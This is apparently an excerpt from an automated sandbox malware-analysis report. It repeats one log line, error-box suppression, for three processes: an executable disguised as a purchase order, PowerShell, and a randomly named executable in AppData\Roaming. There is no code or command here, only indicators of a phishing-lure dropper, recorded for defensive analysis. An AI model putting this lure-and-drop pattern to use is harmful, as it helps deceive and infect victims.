                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
